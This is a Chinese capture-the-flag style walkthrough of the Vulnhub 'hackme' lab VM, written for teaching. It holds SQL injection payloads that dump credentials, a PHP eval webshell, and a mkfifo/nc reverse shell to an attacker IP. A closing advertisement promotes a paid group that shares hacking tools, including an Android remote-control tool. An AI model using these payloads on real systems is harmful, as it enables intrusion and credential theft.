当前位置: 首页 > news >正文

渗透Vulnhub-hackme靶机

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解

一、信息收集阶段

靶机地址:https://download.vulnhub.com/hackme/hackme.ova‌


因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24 

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.178
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

二、攻击阶段

1、web目录枚举

dirb http://192.168.60.178
http://192.168.60.178/login.php
http://192.168.60.178/uploads/

2、尝试注册用户

3、搜索信息

4、sql手工注入

(1)判断列数
oscp' or 1=1 order by 3 -- qwq

(2)联合查询
oscp' or 1=1 order by 3 -- qwq

(3)查询当前
oscp' union select database(),2,3 -- qwq   
# webapphacking	

(4)暴数据库
oscp' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq
# information_schema,mysql,performance_schema,sys,webapphacking

(5)暴当前数据库的表
oscp' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq
#  books,users

(6)users表的列(字段)
oscp' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq 
# id,user,pasword,name,address

(7)暴表数据
oscp' union select group_concat(user,'-',pasword),2,3 from users -- qwq 
# user1-5d41402abc4b2a76b9719d911017c592   MD5解密:hello
# user2-6269c4f71a55b24bad0f0267d9be5508		MD5解密:commando
# user3-0f359740bd1cda994f8b55330c86d845		MD5解密:p@ssw0rd
# test-05a671c66aefea124cc08b76ea6d30bb			MD5解密:testtest
# superadmin-2386acb2cf356944177746fc92523983		MD5解密:Uncrackable
# test1-05a671c66aefea124cc08b76ea6d30bb		MD5解密:testtest
# abc-e10adc3949ba59abbe56e057f20f883e		MD5解密:123456

5、登录superadmin账号

通过sql注入获得superman账号 密码:Uncrackable

6、上传一句话木马

<?php @eval($_POST['cmd']);?>

7、蚁剑连接一句话

8、反弹shell

nc -lvvp  4444

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.60.128 4444 >/tmp/f

三、提权阶段

1、信息收集

cd /home/legacy

2、执行提权文件

.\touchmenot

内部帮会

可以加入一下我们的帮会,是真正的红队大佬创建的,里面会定时丢些网上没有的工具(比如安卓远控7.4,不过现在已经删除了,有时限,加入的记得看好时间),现在只要99就可以终身,后面人多了就会涨价了


http://www.mrgr.cn/news/83640.html

相关文章:

  • LabVIEW滤波器功能
  • K8s 之 Pod 高级用法(Advanced Usage of Pods in Kubernetes)
  • SpringBoot:使用HTTP2+protobuf实现高性能微服务调用
  • 探索 C++ 与 LibUSB:开启 USB 设备交互的奇幻之旅
  • 【Qt】QThread总结
  • 非PHP开源内容管理系统(CMS)一览
  • Windows 11更新之后卡顿 (黑神话掉帧严重)问题探索
  • 聊聊AI Agent
  • windows及linux 安装 Yarn 4.x 版本
  • Linux的基础IO
  • SpringBoot之LazyInitializationBeanFactoryPostProcessor类源码学习
  • 金融项目实战 04|JMeter实现自动化脚本接口测试及持续集成
  • LLMBook 大模型数据集下载地址完整收集
  • Github配置ssh key,密钥配对错误怎么解决?
  • Open FPV VTX开源之第一次出图
  • Day05-后端Web基础——TomcatServletHTTP协议SpringBootWeb入门
  • 【AIDD药物研发】张载熙-生成式AI4药物发现
  • 《自动驾驶与机器人中的SLAM技术》ch8:基于 IESKF 的紧耦合 LIO 系统
  • 知识图谱抽取分析中,如何做好实体对齐?
  • Java List去重:Stream、HashMap与TreeSet对比分析
  • 初识Java3
  • 前端验证码实现
  • Java线程池解密
  • SpringData-Redis缓存之RedisTemplate
  • SpringCloud微服务:基于Nacos组件,整合Dubbo框架
  • 镀锡薄板与镀锡废水详解